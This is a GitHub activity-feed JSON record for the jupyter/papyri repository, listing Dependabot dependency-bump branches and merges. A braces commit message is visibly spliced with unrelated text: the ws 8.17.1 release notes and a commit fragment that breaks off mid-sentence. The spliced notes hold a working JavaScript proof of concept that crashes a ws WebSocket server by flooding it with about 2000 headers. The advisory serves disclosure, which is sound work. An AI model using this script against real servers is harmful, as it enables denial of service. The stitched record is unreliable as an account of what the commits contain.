{"payload":{"feedbackUrl":"https://github.com/orgs/community/discussions/53140","repo":{"id":281771398,"defaultBranch":"main","name":"papyri","ownerLogin":"jupyter","currentUserCanPush":false,"isFork":false,"isEmpty":false,"createdAt":"2020-07-22T19:58:47.000Z","ownerAvatar":"https://avatars.githubusercontent.com/u/7388996?v=4","public":true,"private":false,"isOrgOwned":true},"refInfo":{"name":"","listCacheKey":"v0:1718793271.0","currentOid":""},"activityList":{"items":[{"before":null,"after":"ba8adf0e97771a8f980725ed7db485dc2ac5a1f3","ref":"refs/heads/dependabot/npm_and_yarn/papyri-lab/braces-3.0.3","pushedAt":"2024-06-19T10:34:31.000Z","pushType":"branch_creation","commitsCount":0,"pusher":{"login":"dependabot[bot]","name":null,"path":"/apps/dependabot","primaryAvatarUrl":"https://avatars.githubusercontent.com/in/29110?s=80&v=4"},"commit":{"message":"Bump braces from 3.0.2 to 3.0.3 in /papyri-lab\n\nBumps [braces](https://github.com/micromatch/braces) from 3.0.2 to 3.0.3.\n- [Changelog](https://github.com/micromatch/braces/blob/master/CHANGELOG.md)\n- [Commits](https://github.com/micromatch/braces/compare/3.0.2...3.0.3)\n\n---\nupdated-dependencies:\n- dependency-name: braces\n dependency-type: indirect\n...\n\nSigned-off-by: dependabot[bot]

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

- A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

- ... the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. ... (truncated)

- 3c56601 [dist] 8.17.1
- e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
- 6a00029 [test] Increase code coverage
- ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
- b73b118 [dist] 8.17.0
- 29694a5 [test] Use the highWaterMark variable
- 934c9d6 [ci] Test on node 22
- 1817bac [ci] Do not test on node 21
- 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
- e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
operator work. (#379)"}},{"before":"5a0e0a7495c7ea9252d156ac0d25d6a573f4f554","after":null,"ref":"refs/heads/dependabot/pip/jinja2-3.1.3","pushedAt":"2024-01-15T09:48:04.000Z","pushType":"branch_deletion","commitsCount":0,"pusher":{"login":"Carreau","name":"M Bussonnier","path":"/Carreau","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/335567?s=80&v=4"}},{"before":"658e7121ee7791e6550a34f571cee97b2a48b22a","after":"84788dc360184f43f4ac35751d1c4378086f8309","ref":"refs/heads/main","pushedAt":"2024-01-15T09:48:03.000Z","pushType":"pr_merge","commitsCount":2,"pusher":{"login":"Carreau","name":"M Bussonnier","path":"/Carreau","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/335567?s=80&v=4"},"commit":{"message":"Bump jinja2 from 3.1.2 to 3.1.3 (#375)","shortMessageHtmlLink":"Bump jinja2 from 3.1.2 to 3.1.3 (#375)"}},{"before":null,"after":"5a0e0a7495c7ea9252d156ac0d25d6a573f4f554","ref":"refs/heads/dependabot/pip/jinja2-3.1.3","pushedAt":"2024-01-11T20:56:33.000Z","pushType":"branch_creation","commitsCount":0,"pusher":{"login":"dependabot[bot]","name":null,"path":"/apps/dependabot","primaryAvatarUrl":"https://avatars.githubusercontent.com/in/29110?s=80&v=4"},"commit":{"message":"Bump jinja2 from 3.1.2 to 3.1.3\n\nBumps [jinja2](https://github.com/pallets/jinja) from 3.1.2 to 3.1.3.\n- [Release notes](https://github.com/pallets/jinja/releases)\n- [Changelog](https://github.com/pallets/jinja/blob/main/CHANGES.rst)\n- [Commits](https://github.com/pallets/jinja/compare/3.1.2...3.1.3)\n\n---\nupdated-dependencies:\n- dependency-name: jinja2\n dependency-type: direct:development\n...\n\nSigned-off-by: dependabot[bot]